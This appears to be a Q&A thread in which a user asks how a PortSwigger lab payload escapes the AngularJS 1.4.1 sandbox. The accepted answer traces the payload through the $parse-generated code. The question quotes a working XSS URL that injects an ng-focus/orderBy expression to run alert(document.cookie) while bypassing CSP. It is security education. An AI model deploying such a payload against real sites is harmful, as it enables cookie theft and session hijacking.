# Plz explain this Angular JS script:

Tags: javascript, angularjs

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.1/angular.min.js"></script>
<script>
location='https://www.example.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>
```

Angular JS Version: 1.4.1 (which still uses [Angular JS Sandbox](https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox))

Can anyone explain the script inside location variable after the search part? 
Specifically what is going inside the `orderBy` function? - `'(z=alert)(docuement.cookie)'#x`
How is the alert function being called? etc.

I came across it while solving this lab: https://portswigger.net/web-security/cross-site-scripting/contexts/angularjs-sandbox/lab-angular-sandbox-escape-and-csp

Please let me know if my question needs any more clarification. You can even point me to the specific place at the angularJs docs where this is discussed.

Comment: As described in RFC 2606 and RFC 6761, a number of domains such as example.com and example.org are maintained for documentation purposes. These domains may be used as illustrative examples in documents without prior coordination with us. They are not available for registration or transfer. Check here for more information https://www.iana.org/domains/reserved

Comment: Thanks S Rana, but I don't need clarification for the example.com, I am more confused about the terms that follow after the `/?search=` part.

Comment: PS: the dark mode is awesome.

Answer (score 1, accepted):

First of all the `#x` is not part of the orderBy-expression. It is the url fragment. This causes the browser to focus on the input element, thus triggering the ng-focus event.

Just so that we are on the same page here. This is the injected code: `<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>`

The high level view of the exploit is provided by the solution on the page you linked:

> The exploit uses the ng-focus event in AngularJS to create a focus event that bypasses CSP. It also uses $event, which is an AngularJS variable that references the event object. The path property is specific to Chrome and contains an array of elements that triggered the event. The last element in the array contains the window object.
>
> Normally, | is a bitwise or operation in JavaScript, but in AngularJS it indicates a filter operation, in this case the orderBy filter. The colon signifies an argument that is being sent to the filter. In the argument, instead of calling the alert function directly, we assign it to the variable z. The function will only be called when the orderBy operation reaches the window object in the $event.path array. This means it can be called in the scope of the window without an explicit reference to the window object, effectively bypassing AngularJS's window check.

However this does not explain how the alert function is actually called. The solution is hidden in the depths of the AngularJS source code. AngularJS uses its `$parse`-service to parse expression given to it in attributes. As stated above the expression is a filter-expression using the orderBy-filter. The orderBy-filter implements a function, that takes an array (`$event.path`) and a sort expression (`'(z=alert)(document.cookie)'`) as arguments and returns the ordered array.

What does the orderBy-filter do with the sort expression?
The sort expression is evaluated against the elements of the array to extract the key which should be used to order the elements. (There are plenty of examples in the doc: https://code.angularjs.org/1.4.1/docs/api/ng/filter/orderBy). How does the orderBy-filter do this? It passes the sort expression to the `$parse` function to transform it into a JS function. The resulting function looks like this:

```
    var fn = function(s, l, a, i) {
        var v0, v1, v2, v3, v4, v5 = l && ('z'in l), v6 = l && ('alert'in l), v7, v8, v9 = l && ('document'in l);
        v4 = v5 ? l : s;
        if (!(v5)) {
            if (s) {
                v3 = s.z;
            }
        } else {
            v3 = l.z;
        }
        if (v4 != null) {
            if (!(v6)) {
                if (s) {
                    v2 = s.alert;
                }
            } else {
                v2 = l.alert;
            }
            ensureSafeObject(v4.z, text);
            v1 = v4.z = v2;
            if (v1 != null) {
                ensureSafeFunction(v1, text);
                if (!(v9)) {
                    if (s) {
                        v8 = s.document;
                    }
                } else {
                    v8 = l.document;
                }
                if (v8 != null) {
                    v7 = v8.cookie;
                }
                v0 = ensureSafeObject(v1(ensureSafeObject(v7, text)), text);
            }
        }
        return v0;
    };
```

This function is called for every element in `$event.path`. It is pretty ugly so I tried to clean it up a bit and make it easier to follow:

```
var fn = function(element, l, a, i) {
    // element is the element from $event.path all other parameters are undefined

    // these are all falsy
    const hasLPropertyZ = l && ('z'in l);
    const hasLPropertyAlert = l && ('alert'in l);
    const hasLPropertyDocument = l && ('document'in l);

    const elementOrL = hasLPropertyZ ? l : element;

    // this block is useless
    let elementZ;
    if (!(hasLPropertyZ)) {
        if (element) {
            elementZ = element.z;
        }
    } else {
        elementZ = l.z;
    }
    // ----------------------

    let returnValue;
    if (elementOrL != null) {

        // here begins the real action. We are reading the alert property from our element.
        let elementAlert;
        if (!(hasLPropertyAlert)) {
            if (element) {
                elementAlert = element.alert;
            }
        } else {
            elementAlert = l.alert;
        }

        ensureSafeObject(elementOrL.z, text);
        // and assigning it to property z of our element
        // this is the (z=alert) part of the expression
        const alertFunction = elementOrL.z = elementAlert;

        // if the alertFunction is null (on all elements except the window element) we don't do anything.
        if (alertFunction != null) {
            // one would think that we would get caught here, but this function only checks for call, apply, bind and the function constructor
            ensureSafeFunction(alertFunction, text);

            // here we are reading window.document
            let theDocument;
            if (!(hasLPropertyDocument)) {
                if (element) {
                    theDocument = element.document;
                }
            } else {
                theDocument = l.document;
            }

            // then we read document.cookie
            let theCookie;
            if (theDocument != null) {
                theCookie = theDocument.cookie;
            }

            // executing alert
            returnValue = ensureSafeObject(alertFunction(ensureSafeObject(theCookie, text)), text);
        }
    }
    return returnValue;
};
return fn;
```

As you can see, this function essentially implements the following code:

```
function(element) {
    const alertFunction = element.alert;
    element.z = alertFunction;
    alertFunction(element.document.cookie);
}
```

I hope this helps. Let me know if I can clarify something.

Comment: How do you know that the resulting function looks like this ? Can you add more context and docs ? Thanks :)